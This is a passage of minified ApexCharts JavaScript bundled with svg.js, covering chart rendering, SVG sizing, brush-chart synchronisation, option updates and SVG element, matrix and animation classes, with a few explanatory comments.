_(this.ctx,a),v=this.ctx.bar.draw(t.series));break;case"candlestick":case"boxPlot":v=new we(this.ctx,a).draw(t.series);break;case"rangeBar":v=this.ctx.rangeBar.draw(t.series);break;case"heatmap":v=new je(this.ctx,a).draw(t.series);break;case"treemap":v=new Re(this.ctx,a).draw(t.series);break;case"pie":case"donut":case"polarArea":v=this.ctx.pie.draw(t.series);break;case"radialBar":v=m.draw(t.series);break;case"radar":v=f.draw(t.series);break;default:v=h.draw(t.series)}return v}},{key:"setSVGDimensions",value:function(){var e=this.w.globals,a=this.w.config;e.svgWidth=a.chart.width,e.svgHeight=a.chart.height;var n=k.getDimensions(this.el),i=a.chart.width.toString().split(/[0-9]+/g).pop();"%"===i?k.isNumber(n[0])&&(0===n[0].width&&(n=k.getDimensions(this.el.parentNode)),e.svgWidth=n[0]*parseInt(a.chart.width,10)/100):"px"!==i&&""!==i||(e.svgWidth=parseInt(a.chart.width,10));var t=a.chart.height.toString().split(/[0-9]+/g).pop();if("auto"!==e.svgHeight&&""!==e.svgHeight)if("%"===t){var 
r=k.getDimensions(this.el.parentNode);e.svgHeight=r[1]*parseInt(a.chart.height,10)/100}else e.svgHeight=parseInt(a.chart.height,10);else e.axisCharts?e.svgHeight=e.svgWidth/1.61:e.svgHeight=e.svgWidth/1.2;if(e.svgWidth<0&&(e.svgWidth=0),e.svgHeight<0&&(e.svgHeight=0),S.setAttrs(e.dom.Paper.node,{width:e.svgWidth,height:e.svgHeight}),"%"!==t){var o=a.chart.sparkline.enabled?0:e.axisCharts?a.chart.parentHeightOffset:0;e.dom.Paper.node.parentNode.parentNode.style.minHeight=e.svgHeight+o+"px"}e.dom.elWrap.style.width=e.svgWidth+"px",e.dom.elWrap.style.height=e.svgHeight+"px"}},{key:"shiftGraphPosition",value:function(){var e=this.w.globals,a=e.translateY,n={transform:"translate("+e.translateX+", "+a+")"};S.setAttrs(e.dom.elGraphical.node,n)}},{key:"resizeNonAxisCharts",value:function(){var e=this.w,a=e.globals,n=0,i=e.config.chart.sparkline.enabled?1:15;i+=e.config.grid.padding.bottom,"top"!==e.config.legend.position&&"bottom"!==e.config.legend.position||!e.config.legend.show||e.config.legend.floating||(n=new pe(this.ctx).legendHelpers.getLegendBBox().clwh+10);var t=e.globals.dom.baseEl.querySelector(".apexcharts-radialbar, .apexcharts-pie"),r=2.05*e.globals.radialSize;if(t&&!e.config.chart.sparkline.enabled&&0!==e.config.plotOptions.radialBar.startAngle){var o=k.getBoundingClientRect(t);r=o.bottom;var s=o.bottom-o.top;r=Math.max(2.05*e.globals.radialSize,s)}var l=r+a.translateY+n+i;a.dom.elLegendForeign&&a.dom.elLegendForeign.setAttribute("height",l),a.dom.elWrap.style.height=l+"px",S.setAttrs(a.dom.Paper.node,{height:l}),a.dom.Paper.node.parentNode.parentNode.style.minHeight=l+"px"}},{key:"coreCalculations",value:function(){new Q(this.ctx).init()}},{key:"resetGlobals",value:function(){var e=this,a=function(){return e.w.config.series.map((function(e){return[]}))},n=new G,i=this.w.globals;n.initGlobalVars(i),i.seriesXvalues=a(),i.seriesYvalues=a()}},{key:"isMultipleY",value:function(){if(this.w.config.yaxis.constructor===Array&&this.w.config.yaxis.length>1)return this.w.globals.isMultipleYAxis=!0,!0}},{key:"xySettings",value:function(){var e=null,a=this.w;if(a.globals.axisCharts){if("back"===a.config.xaxis.crosshairs.position&&new ie(this.ctx).drawXCrosshairs(),"back"===a.config.yaxis[0].crosshairs.position&&new ie(this.ctx).drawYCrosshairs(),"datetime"===a.config.xaxis.type&&void 0===a.config.xaxis.labels.formatter){this.ctx.timeScale=new Ke(this.ctx);var n=[];isFinite(a.globals.minX)&&isFinite(a.globals.maxX)&&!a.globals.isBarHorizontal?n=this.ctx.timeScale.calculateTimeScaleTicks(a.globals.minX,a.globals.maxX):a.globals.isBarHorizontal&&(n=this.ctx.timeScale.calculateTimeScaleTicks(a.globals.minY,a.globals.maxY)),this.ctx.timeScale.recalcDimensionsBasedOnFormat(n)}e=new A(this.ctx).getCalculatedRatios()}return e}},{key:"updateSourceChart",value:function(e){this.ctx.w.globals.selection=void 0,this.ctx.updateHelpers._updateOptions({chart:{selection:{xaxis:{min:e.w.globals.minX,max:e.w.globals.maxX}}}},!1,!1)}},{key:"setupBrushHandler",value:function(){var e=this,a=this.w;if(a.config.chart.brush.enabled&&"function"!=typeof a.config.chart.events.selection){var n=a.config.chart.brush.targets||[a.config.chart.brush.target];n.forEach((function(a){var n=ApexCharts.getChartByID(a);n.w.globals.brushSource=e.ctx,"function"!=typeof n.w.config.chart.events.zoomed&&(n.w.config.chart.events.zoomed=function(){e.updateSourceChart(n)}),"function"!=typeof 
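/*
 * Brush wiring, continued below: every target chart listed in chart.brush gets
 * zoomed/scrolled handlers that sync back through updateSourceChart, and the
 * source chart's selection event pushes its xaxis.min/max (plus an optionally
 * auto-scaled yaxis) into each target via _updateOptions. The user-side options
 * this code expects look roughly like the following (ids and values illustrative):
 *
 *   // target chart:  chart: { id: 'detail' }
 *   // source chart:  chart: { id: 'brush1', brush: { target: 'detail', enabled: true },
 *   //                         selection: { enabled: true, xaxis: { min: t0, max: t1 } } }
 */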
n.w.config.chart.events.scrolled&&(n.w.config.chart.events.scrolled=function(){e.updateSourceChart(n)})})),a.config.chart.events.selection=function(e,i){n.forEach((function(e){var n=ApexCharts.getChartByID(e),t=k.clone(a.config.yaxis);if(a.config.chart.brush.autoScaleYaxis&&1===n.w.globals.series.length){var o=new X(n);t=o.autoScaleY(n,t,i)}var s=n.w.config.yaxis.reduce((function(e,a,i){return[].concat(v(e),[r(r({},n.w.config.yaxis[i]),{},{min:t[0].min,max:t[0].max})])}),[]);n.ctx.updateHelpers._updateOptions({xaxis:{min:i.xaxis.min,max:i.xaxis.max},yaxis:s},!1,!1,!1,!1)}))}}}}]),e}(),_e=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"_updateOptions",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]&&arguments[1],i=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],t=!(arguments.length>3&&void 0!==arguments[3])||arguments[3],r=arguments.length>4&&void 0!==arguments[4]&&arguments[4];return new Promise((function(s){var l=[a.ctx];t&&(l=a.ctx.getSyncedCharts()),a.ctx.w.globals.isExecCalled&&(l=[a.ctx],a.ctx.w.globals.isExecCalled=!1),l.forEach((function(t,u){var c=t.w;if(c.globals.shouldAnimate=i,n||(c.globals.resized=!0,c.globals.dataChanged=!0,i&&t.series.getPreviousPaths()),e&&"object"===o(e)&&(t.config=new F(e),e=A.extendArrayProps(t.config,e,c),t.w.globals.chartID!==a.ctx.w.globals.chartID&&delete e.series,c.config=k.extend(c.config,e),r&&(c.globals.lastXAxis=e.xaxis?k.clone(e.xaxis):[],c.globals.lastYAxis=e.yaxis?k.clone(e.yaxis):[],c.globals.initialConfig=k.extend({},c.config),c.globals.initialSeries=k.clone(c.config.series),e.series))){for(var d=0;d2&&void 0!==arguments[2]&&arguments[2];return new Promise((function(t){var r,o=n.w;return o.globals.shouldAnimate=a,o.globals.dataChanged=!0,a&&n.ctx.series.getPreviousPaths(),o.globals.axisCharts?(0===(r=e.map((function(e,a){return n._extendSeries(e,a)}))).length&&(r=[{data:[]}]),o.config.series=r):o.config.series=e.slice(),i&&(o.globals.initialSeries=k.clone(o.config.series)),n.ctx.update().then((function(){t(n.ctx)}))}))}},{key:"_extendSeries",value:function(e,a){var n=this.w,i=n.config.series[a];return r(r({},n.config.series[a]),{},{name:e.name?e.name:i&&i.name,color:e.color?e.color:i&&i.color,type:e.type?e.type:i&&i.type,data:e.data?e.data:i&&i.data})}},{key:"toggleDataPointSelection",value:function(e,a){var n=this.w,i=null,t=".apexcharts-series[data\\:realIndex='".concat(e,"']");return n.globals.axisCharts?i=n.globals.dom.Paper.select("".concat(t," path[j='").concat(a,"'], ").concat(t," circle[j='").concat(a,"'], ").concat(t," rect[j='").concat(a,"']")).members[0]:void 0===a&&(i=n.globals.dom.Paper.select("".concat(t," path[j='").concat(e,"']")).members[0],"pie"!==n.config.chart.type&&"polarArea"!==n.config.chart.type&&"donut"!==n.config.chart.type||this.ctx.pie.pieClicked(e)),i?(new S(this.ctx).pathMouseDown(i,null),i.node?i.node:null):(console.warn("toggleDataPointSelection: Element not found"),null)}},{key:"forceXAxisUpdate",value:function(e){var a=this.w;if(["min","max"].forEach((function(n){void 0!==e.xaxis[n]&&(a.config.xaxis[n]=e.xaxis[n],a.globals.lastXAxis[n]=e.xaxis[n])})),e.xaxis.categories&&e.xaxis.categories.length&&(a.config.xaxis.categories=e.xaxis.categories),a.config.xaxis.convertedCatToNumeric){var n=new V(e);e=n.convertCatToNumericXaxis(e,this.ctx)}return e}},{key:"forceYAxisUpdate",value:function(e){var a=this.w;return 
a.config.chart.stacked&&"100%"===a.config.chart.stackType&&(Array.isArray(e.yaxis)?e.yaxis.forEach((function(a,n){e.yaxis[n].min=0,e.yaxis[n].max=100})):(e.yaxis.min=0,e.yaxis.max=100)),e}},{key:"revertDefaultAxisMinMax",value:function(e){var a=this,n=this.w,i=n.globals.lastXAxis,t=n.globals.lastYAxis;e&&e.xaxis&&(i=e.xaxis),e&&e.yaxis&&(t=e.yaxis),n.config.xaxis.min=i.min,n.config.xaxis.max=i.max;n.config.yaxis.map((function(e,i){n.globals.zoomed||void 0!==t[i]?function(e){void 0!==t[e]&&(n.config.yaxis[e].min=t[e].min,n.config.yaxis[e].max=t[e].max)}(i):void 0!==a.ctx.opts.yaxis[i]&&(e.min=a.ctx.opts.yaxis[i].min,e.max=a.ctx.opts.yaxis[i].max)}))}}]),e}();Ne="undefined"!=typeof window?window:void 0,Ee=function(e,a){var n=(void 0!==this?this:e).SVG=function(e){if(n.supported)return e=new n.Doc(e),n.parser.draw||n.prepare(),e};if(n.ns="http://www.w3.org/2000/svg",n.xmlns="http://www.w3.org/2000/xmlns/",n.xlink="http://www.w3.org/1999/xlink",n.svgjs="http://svgjs.dev",n.supported=!0,!n.supported)return!1;n.did=1e3,n.eid=function(e){return"Svgjs"+d(e)+n.did++},n.create=function(e){var n=a.createElementNS(this.ns,e);return n.setAttribute("id",this.eid(e)),n},n.extend=function(){var e,a;a=(e=[].slice.call(arguments)).pop();for(var i=e.length-1;i>=0;i--)if(e[i])for(var t in a)e[i].prototype[t]=a[t];n.Set&&n.Set.inherit&&n.Set.inherit()},n.invent=function(e){var a="function"==typeof e.create?e.create:function(){this.constructor.call(this,n.create(e.create))};return e.inherit&&(a.prototype=new e.inherit),e.extend&&n.extend(a,e.extend),e.construct&&n.extend(e.parent||n.Container,e.construct),a},n.adopt=function(a){return a?a.instance?a.instance:((i="svg"==a.nodeName?a.parentNode instanceof e.SVGElement?new n.Nested:new n.Doc:"linearGradient"==a.nodeName?new n.Gradient("linear"):"radialGradient"==a.nodeName?new n.Gradient("radial"):n[d(a.nodeName)]?new(n[d(a.nodeName)]):new n.Element(a)).type=a.nodeName,i.node=a,a.instance=i,i instanceof n.Doc&&i.namespace().defs(),i.setData(JSON.parse(a.getAttribute("svgjs:data"))||{}),i):null;var i},n.prepare=function(){var e=a.getElementsByTagName("body")[0],i=(e?new n.Doc(e):n.adopt(a.documentElement).nested()).size(2,0);n.parser={body:e||a.documentElement,draw:i.style("opacity:0;position:absolute;left:-100%;top:-100%;overflow:hidden").node,poly:i.polyline().node,path:i.path().node,native:n.create("svg")}},n.parser={native:n.create("svg")},a.addEventListener("DOMContentLoaded",(function(){n.parser.draw||n.prepare()}),!1),n.regex={numberAndUnit:/^([+-]?(\d+(\.\d*)?|\.\d+)(e[+-]?\d+)?)([a-z%]*)$/i,hex:/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i,rgb:/rgb\((\d+),(\d+),(\d+)\)/,reference:/#([a-z0-9\-_]+)/i,transforms:/\)\s*,?\s*/,whitespace:/\s/g,isHex:/^#[a-f0-9]{3,6}$/i,isRgb:/^rgb\(/,isCss:/[^:]+:[^;]+;?/,isBlank:/^(\s+)?$/,isNumber:/^[+-]?(\d+(\.\d*)?|\.\d+)(e[+-]?\d+)?$/i,isPercent:/^-?[\d\.]+%$/,isImage:/\.(jpg|jpeg|png|gif|svg)(\?[^=]+.*)?/i,delimiter:/[\s,]+/,hyphen:/([^e])\-/gi,pathLetters:/[MLHVCSQTAZ]/gi,isPathLetter:/[MLHVCSQTAZ]/i,numbersWithDots:/((\d?\.\d+(?:e[+-]?\d+)?)((?:\.\d+(?:e[+-]?\d+)?)+))+/gi,dots:/\./g},n.utils={map:function(e,a){for(var n=e.length,i=[],t=0;t1?1:e,new n.Color({r:~~(this.r+(this.destination.r-this.r)*e),g:~~(this.g+(this.destination.g-this.g)*e),b:~~(this.b+(this.destination.b-this.b)*e)})):this}}),n.Color.test=function(e){return e+="",n.regex.isHex.test(e)||n.regex.isRgb.test(e)},n.Color.isRgb=function(e){return e&&"number"==typeof e.r&&"number"==typeof e.g&&"number"==typeof e.b},n.Color.isColor=function(e){return 
n.Color.isRgb(e)||n.Color.test(e)},n.Array=function(e,a){0==(e=(e||[]).valueOf()).length&&a&&(e=a.valueOf()),this.value=this.parse(e)},n.extend(n.Array,{toString:function(){return this.value.join(" ")},valueOf:function(){return this.value},parse:function(e){return e=e.valueOf(),Array.isArray(e)?e:this.split(e)}}),n.PointArray=function(e,a){n.Array.call(this,e,a||[[0,0]])},n.PointArray.prototype=new n.Array,n.PointArray.prototype.constructor=n.PointArray;for(var i={M:function(e,a,n){return a.x=n.x=e[0],a.y=n.y=e[1],["M",a.x,a.y]},L:function(e,a){return a.x=e[0],a.y=e[1],["L",e[0],e[1]]},H:function(e,a){return a.x=e[0],["H",e[0]]},V:function(e,a){return a.y=e[0],["V",e[0]]},C:function(e,a){return a.x=e[4],a.y=e[5],["C",e[0],e[1],e[2],e[3],e[4],e[5]]},Q:function(e,a){return a.x=e[2],a.y=e[3],["Q",e[0],e[1],e[2],e[3]]},Z:function(e,a,n){return a.x=n.x,a.y=n.y,["Z"]}},t="mlhvqtcsaz".split(""),r=0,s=t.length;rl);return r},bbox:function(){return n.parser.draw||n.prepare(),n.parser.path.setAttribute("d",this.toString()),n.parser.path.getBBox()}}),n.Number=n.invent({create:function(e,a){this.value=0,this.unit=a||"","number"==typeof e?this.value=isNaN(e)?0:isFinite(e)?e:e<0?-34e37:34e37:"string"==typeof e?(a=e.match(n.regex.numberAndUnit))&&(this.value=parseFloat(a[1]),"%"==a[5]?this.value/=100:"s"==a[5]&&(this.value*=1e3),this.unit=a[5]):e instanceof n.Number&&(this.value=e.valueOf(),this.unit=e.unit)},extend:{toString:function(){return("%"==this.unit?~~(1e8*this.value)/1e6:"s"==this.unit?this.value/1e3:this.value)+this.unit},toJSON:function(){return this.toString()},valueOf:function(){return this.value},plus:function(e){return e=new n.Number(e),new n.Number(this+e,this.unit||e.unit)},minus:function(e){return e=new n.Number(e),new n.Number(this-e,this.unit||e.unit)},times:function(e){return e=new n.Number(e),new n.Number(this*e,this.unit||e.unit)},divide:function(e){return e=new n.Number(e),new n.Number(this/e,this.unit||e.unit)},to:function(e){var a=new n.Number(this);return"string"==typeof e&&(a.unit=e),a},morph:function(e){return this.destination=new n.Number(e),e.relative&&(this.destination.value+=this.value),this},at:function(e){return this.destination?new n.Number(this.destination).minus(this).times(e).plus(this):this}}}),n.Element=n.invent({create:function(e){this._stroke=n.defaults.attrs.stroke,this._event=null,this.dom={},(this.node=e)&&(this.type=e.nodeName,this.node.instance=this,this._stroke=e.getAttribute("stroke")||this._stroke)},extend:{x:function(e){return this.attr("x",e)},y:function(e){return this.attr("y",e)},cx:function(e){return null==e?this.x()+this.width()/2:this.x(e-this.width()/2)},cy:function(e){return null==e?this.y()+this.height()/2:this.y(e-this.height()/2)},move:function(e,a){return this.x(e).y(a)},center:function(e,a){return this.cx(e).cy(a)},width:function(e){return this.attr("width",e)},height:function(e){return this.attr("height",e)},size:function(e,a){var i=p(this,e,a);return this.width(new n.Number(i.width)).height(new n.Number(i.height))},clone:function(e){this.writeDataToDom();var a=v(this.node.cloneNode(!0));return e?e.add(a):this.after(a),a},remove:function(){return this.parent()&&this.parent().removeElement(this),this},replace:function(e){return this.after(e).remove(),e},addTo:function(e){return e.put(this)},putIn:function(e){return e.add(this)},id:function(e){return this.attr("id",e)},show:function(){return this.style("display","")},hide:function(){return 
this.style("display","none")},visible:function(){return"none"!=this.style("display")},toString:function(){return this.attr("id")},classes:function(){var e=this.attr("class");return null==e?[]:e.trim().split(n.regex.delimiter)},hasClass:function(e){return-1!=this.classes().indexOf(e)},addClass:function(e){if(!this.hasClass(e)){var a=this.classes();a.push(e),this.attr("class",a.join(" "))}return this},removeClass:function(e){return this.hasClass(e)&&this.attr("class",this.classes().filter((function(a){return a!=e})).join(" ")),this},toggleClass:function(e){return this.hasClass(e)?this.removeClass(e):this.addClass(e)},reference:function(e){return n.get(this.attr(e))},parent:function(a){var i=this;if(!i.node.parentNode)return null;if(i=n.adopt(i.node.parentNode),!a)return i;for(;i&&i.node instanceof e.SVGElement;){if("string"==typeof a?i.matches(a):i instanceof a)return i;if(!i.node.parentNode||"#document"==i.node.parentNode.nodeName)return null;i=n.adopt(i.node.parentNode)}},doc:function(){return this instanceof n.Doc?this:this.parent(n.Doc)},parents:function(e){var a=[],n=this;do{if(!(n=n.parent(e))||!n.node)break;a.push(n)}while(n.parent);return a},matches:function(e){return function(e,a){return(e.matches||e.matchesSelector||e.msMatchesSelector||e.mozMatchesSelector||e.webkitMatchesSelector||e.oMatchesSelector).call(e,a)}(this.node,e)},native:function(){return this.node},svg:function(e){var i=a.createElement("svg");if(!(e&&this instanceof n.Parent))return i.appendChild(e=a.createElement("svg")),this.writeDataToDom(),e.appendChild(this.node.cloneNode(!0)),i.innerHTML.replace(/^/,"").replace(/<\/svg>$/,"");i.innerHTML=""+e.replace(/\n/,"").replace(/<([\w:-]+)([^<]+?)\/>/g,"<$1$2>")+"";for(var t=0,r=i.firstChild.childNodes.length;t":function(e){return-Math.cos(e*Math.PI)/2+.5},">":function(e){return Math.sin(e*Math.PI/2)},"<":function(e){return 1-Math.cos(e*Math.PI/2)}},n.morph=function(e){return function(a,i){return new n.MorphObj(a,i).at(e)}},n.Situation=n.invent({create:function(e){this.init=!1,this.reversed=!1,this.reversing=!1,this.duration=new n.Number(e.duration).valueOf(),this.delay=new n.Number(e.delay).valueOf(),this.start=+new Date+this.delay,this.finish=this.start+this.duration,this.ease=e.ease,this.loop=0,this.loops=!1,this.animations={},this.attrs={},this.styles={},this.transforms=[],this.once={}}}),n.FX=n.invent({create:function(e){this._target=e,this.situations=[],this.active=!1,this.situation=null,this.paused=!1,this.lastPos=0,this.pos=0,this.absPos=0,this._speed=1},extend:{animate:function(e,a,i){"object"===o(e)&&(a=e.ease,i=e.delay,e=e.duration);var t=new n.Situation({duration:e||1e3,delay:i||0,ease:n.easing[a||"-"]||a});return this.queue(t),this},target:function(e){return e&&e instanceof n.Element?(this._target=e,this):this._target},timeToAbsPos:function(e){return(e-this.situation.start)/(this.situation.duration/this._speed)},absPosToTime:function(e){return this.situation.duration/this._speed*e+this.situation.start},startAnimFrame:function(){this.stopAnimFrame(),this.animationFrame=e.requestAnimationFrame(function(){this.step()}.bind(this))},stopAnimFrame:function(){e.cancelAnimationFrame(this.animationFrame)},start:function(){return!this.active&&this.situation&&(this.active=!0,this.startCurrent()),this},startCurrent:function(){return this.situation.start=+new Date+this.situation.delay/this._speed,this.situation.finish=this.situation.start+this.situation.duration/this._speed,this.initAnimations().step()},queue:function(e){return("function"==typeof e||e instanceof 
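/*
 * The svg.js FX module around this point queues "Situation" objects (duration,
 * delay, easing, morph targets): start() stamps situation.start = now + delay,
 * and on every animation frame step() converts wall-clock time into a 0..1
 * position, eases it, and writes the interpolated attribute, style, and
 * transform values. The time-to-position mapping used by timeToAbsPos above,
 * as a sketch:
 *
 *   var pos = (Date.now() - situation.start) / (situation.duration / speed);
 *   pos = Math.max(0, Math.min(1, pos));  // clamp before applying the easing
 */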
n.Situation)&&this.situations.push(e),this.situation||(this.situation=this.situations.shift()),this},dequeue:function(){return this.stop(),this.situation=this.situations.shift(),this.situation&&(this.situation instanceof n.Situation?this.start():this.situation.call(this)),this},initAnimations:function(){var e,a=this.situation;if(a.init)return this;for(var i in a.animations){e=this.target()[i](),Array.isArray(e)||(e=[e]),Array.isArray(a.animations[i])||(a.animations[i]=[a.animations[i]]);for(var t=e.length;t--;)a.animations[i][t]instanceof n.Number&&(e[t]=new n.Number(e[t])),a.animations[i][t]=e[t].morph(a.animations[i][t])}for(var i in a.attrs)a.attrs[i]=new n.MorphObj(this.target().attr(i),a.attrs[i]);for(var i in a.styles)a.styles[i]=new n.MorphObj(this.target().style(i),a.styles[i]);return a.initialTransformation=this.target().matrixify(),a.init=!0,this},clearQueue:function(){return this.situations=[],this},clearCurrent:function(){return this.situation=null,this},stop:function(e,a){var n=this.active;return this.active=!1,a&&this.clearQueue(),e&&this.situation&&(!n&&this.startCurrent(),this.atEnd()),this.stopAnimFrame(),this.clearCurrent()},after:function(e){var a=this.last();return this.target().on("finished.fx",(function n(i){i.detail.situation==a&&(e.call(this,a),this.off("finished.fx",n))})),this._callStart()},during:function(e){var a=this.last(),i=function(i){i.detail.situation==a&&e.call(this,i.detail.pos,n.morph(i.detail.pos),i.detail.eased,a)};return this.target().off("during.fx",i).on("during.fx",i),this.after((function(){this.off("during.fx",i)})),this._callStart()},afterAll:function(e){var a=function a(n){e.call(this),this.off("allfinished.fx",a)};return this.target().off("allfinished.fx",a).on("allfinished.fx",a),this._callStart()},last:function(){return this.situations.length?this.situations[this.situations.length-1]:this.situation},add:function(e,a,n){return this.last()[n||"animations"][e]=a,this._callStart()},step:function(e){var a,n,i;e||(this.absPos=this.timeToAbsPos(+new Date)),!1!==this.situation.loops?(a=Math.max(this.absPos,0),n=Math.floor(a),!0===this.situation.loops||nthis.lastPos&&r<=t&&(this.situation.once[r].call(this.target(),this.pos,t),delete this.situation.once[r]);return this.active&&this.target().fire("during",{pos:this.pos,eased:t,fx:this,situation:this.situation}),this.situation?(this.eachAt(),1==this.pos&&!this.situation.reversed||this.situation.reversed&&0==this.pos?(this.stopAnimFrame(),this.target().fire("finished",{fx:this,situation:this.situation}),this.situations.length||(this.target().fire("allfinished"),this.situations.length||(this.target().off(".fx"),this.active=!1)),this.active?this.dequeue():this.clearCurrent()):!this.paused&&this.active&&this.startAnimFrame(),this.lastPos=t,this):this},eachAt:function(){var e,a=this,i=this.target(),t=this.situation;for(var r in t.animations)e=[].concat(t.animations[r]).map((function(e){return"string"!=typeof e&&e.at?e.at(t.ease(a.pos),a.pos):e})),i[r].apply(i,e);for(var r in t.attrs)e=[r].concat(t.attrs[r]).map((function(e){return"string"!=typeof e&&e.at?e.at(t.ease(a.pos),a.pos):e})),i.attr.apply(i,e);for(var r in t.styles)e=[r].concat(t.styles[r]).map((function(e){return"string"!=typeof e&&e.at?e.at(t.ease(a.pos),a.pos):e})),i.style.apply(i,e);if(t.transforms.length){e=t.initialTransformation,r=0;for(var o=t.transforms.length;r=0;--i)this[k[i]]=null!=e[k[i]]?e[k[i]]:a[k[i]]},extend:{extract:function(){var e=m(this,0,1);m(this,1,0);var 
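/*
 * Matrix.extract, resuming below, decomposes the 2x3 affine matrix
 * [a b c d e f]: the translation is (e, f), and the rotation is recovered from
 * where the matrix sends a basis vector (the code transforms the point (0, 1)
 * and takes atan2 minus 90 degrees). For a skew-free matrix this reduces to
 * the standard identity, sketched here:
 *
 *   function rotationOf(m) {
 *     // m maps (1, 0) to (m.a, m.b); that vector's angle is the rotation
 *     return 180 / Math.PI * Math.atan2(m.b, m.a);
 *   }
 */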
a=180/Math.PI*Math.atan2(e.y,e.x)-90;return{x:this.e,y:this.f,transformedX:(this.e*Math.cos(a*Math.PI/180)+this.f*Math.sin(a*Math.PI/180))/Math.sqrt(this.a*this.a+this.b*this.b),transformedY:(this.f*Math.cos(a*Math.PI/180)+this.e*Math.sin(-a*Math.PI/180))/Math.sqrt(this.c*this.c+this.d*this.d),rotation:a,a:this.a,b:this.b,c:this.c,d:this.d,e:this.e,f:this.f,matrix:new n.Matrix(this)}},clone:function(){return new n.Matrix(this)},morph:function(e){return this.destination=new n.Matrix(e),this},multiply:function(e){return new n.Matrix(this.native().multiply(function(e){return e instanceof n.Matrix||(e=new n.Matrix(e)),e}(e).native()))},inverse:function(){return new n.Matrix(this.native().inverse())},translate:function(e,a){return new n.Matrix(this.native().translate(e||0,a||0))},native:function(){for(var e=n.parser.native.createSVGMatrix(),a=k.length-1;a>=0;a--)e[k[a]]=this[k[a]];return e},toString:function(){return"matrix("+b(this.a)+","+b(this.b)+","+b(this.c)+","+b(this.d)+","+b(this.e)+","+b(this.f)+")"}},parent:n.Element,construct:{ctm:function(){return new n.Matrix(this.node.getCTM())},screenCTM:function(){if(this instanceof n.Nested){var e=this.rect(1,1),a=e.node.getScreenCTM();return e.remove(),new n.Matrix(a)}return new n.Matrix(this.node.getScreenCTM())}}}),n.Point=n.invent({create:function(e,a){var n;n=Array.isArray(e)?{x:e[0],y:e[1]}:"object"===o(e)?{x:e.x,y:e.y}:null!=e?{x:e,y:null!=a?a:e}:{x:0,y:0},this.x=n.x,this.y=n.y},extend:{clone:function(){return new n.Point(this)},morph:function(e,a){return this.destination=new n.Point(e,a),this}}}),n.extend(n.Element,{point:function(e,a){return new n.Point(e,a).transform(this.screenCTM().inverse())}}),n.extend(n.Element,{attr:function(e,a,i){if(null==e){for(e={},i=(a=this.node.attributes).length-1;i>=0;i--)e[a[i].nodeName]=n.regex.isNumber.test(a[i].nodeValue)?parseFloat(a[i].nodeValue):a[i].nodeValue;return e}if("object"===o(e))for(var t in e)this.attr(t,e[t]);else if(null===a)this.node.removeAttribute(e);else{if(null==a)return null==(a=this.node.getAttribute(e))?n.defaults.attrs[e]:n.regex.isNumber.test(a)?parseFloat(a):a;"stroke-width"==e?this.attr("stroke",parseFloat(a)>0?this._stroke:null):"stroke"==e&&(this._stroke=a),"fill"!=e&&"stroke"!=e||(n.regex.isImage.test(a)&&(a=this.doc().defs().image(a,0,0)),a instanceof n.Image&&(a=this.doc().defs().pattern(0,0,(function(){this.add(a)})))),"number"==typeof a?a=new n.Number(a):n.Color.isColor(a)?a=new n.Color(a):Array.isArray(a)&&(a=new n.Array(a)),"leading"==e?this.leading&&this.leading(a):"string"==typeof i?this.node.setAttributeNS(i,e,a.toString()):this.node.setAttribute(e,a.toString()),!this.rebuild||"font-size"!=e&&"x"!=e||this.rebuild(e,a)}return this}}),n.extend(n.Element,{transform:function(e,a){var i;return"object"!==o(e)?(i=new n.Matrix(this).extract(),"string"==typeof e?i[e]:i):(i=new n.Matrix(this),a=!!a||!!e.relative,null!=e.a&&(i=a?i.multiply(new n.Matrix(e)):new n.Matrix(e)),this.attr("transform",i))}}),n.extend(n.Element,{untransform:function(){return this.attr("transform",null)},matrixify:function(){return(this.attr("transform")||"").split(n.regex.transforms).slice(0,-1).map((function(e){var a=e.trim().split("(");return[a[0],a[1].split(n.regex.delimiter).map((function(e){return parseFloat(e)}))]})).reduce((function(e,a){return"matrix"==a[0]?e.multiply(f(a[1])):e[a[0]].apply(e,a[1])}),new n.Matrix)},toParent:function(e){if(this==e)return this;var a=this.screenCTM(),n=e.screenCTM().inverse();return 
this.addTo(e).untransform().transform(n.multiply(a)),this},toDoc:function(){return this.toParent(this.doc())}}),n.Transformation=n.invent({create:function(e,a){if(arguments.length>1&&"boolean"!=typeof a)return this.constructor.call(this,[].slice.call(arguments));if(Array.isArray(e))for(var n=0,i=this.arguments.length;n=0},index:function(e){return[].slice.call(this.node.childNodes).indexOf(e.node)},get:function(e){return n.adopt(this.node.childNodes[e])},first:function(){return this.get(0)},last:function(){return this.get(this.node.childNodes.length-1)},each:function(e,a){for(var i=this.children(),t=0,r=i.length;t=0;i--)a.childNodes[i]instanceof e.SVGElement&&v(a.childNodes[i]);return n.adopt(a).id(n.eid(a.nodeName))}function g(e){return null==e.x&&(e.x=0,e.y=0,e.width=0,e.height=0),e.w=e.width,e.h=e.height,e.x2=e.x+e.width,e.y2=e.y+e.height,e.cx=e.x+e.width/2,e.cy=e.y+e.height/2,e}function b(e){return Math.abs(e)>1e-37?e:0}["fill","stroke"].forEach((function(e){var a={};a[e]=function(a){if(void 0===a)return this;if("string"==typeof a||n.Color.isRgb(a)||a&&"function"==typeof a.fill)this.attr(e,a);else for(var i=l[e].length-1;i>=0;i--)null!=a[l[e][i]]&&this.attr(l.prefix(e,l[e][i]),a[l[e][i]]);return this},n.extend(n.Element,n.FX,a)})),n.extend(n.Element,n.FX,{translate:function(e,a){return this.transform({x:e,y:a})},matrix:function(e){return this.attr("transform",new n.Matrix(6==arguments.length?[].slice.call(arguments):e))},opacity:function(e){return this.attr("opacity",e)},dx:function(e){return this.x(new n.Number(e).plus(this instanceof n.FX?0:this.x()),!0)},dy:function(e){return this.y(new n.Number(e).plus(this instanceof n.FX?0:this.y()),!0)}}),n.extend(n.Path,{length:function(){return this.node.getTotalLength()},pointAt:function(e){return this.node.getPointAtLength(e)}}),n.Set=n.invent({create:function(e){Array.isArray(e)?this.members=e:this.clear()},extend:{add:function(){for(var e=[].slice.call(arguments),a=0,n=e.length;a-1&&this.members.splice(a,1),this},each:function(e){for(var a=0,n=this.members.length;a=0},index:function(e){return this.members.indexOf(e)},get:function(e){return this.members[e]},first:function(){return this.get(0)},last:function(){return this.get(this.members.length-1)},valueOf:function(){return this.members}},construct:{set:function(e){return new n.Set(e)}}}),n.FX.Set=n.invent({create:function(e){this.set=e}}),n.Set.inherit=function(){var e=[];for(var a in n.Shape.prototype)"function"==typeof n.Shape.prototype[a]&&"function"!=typeof 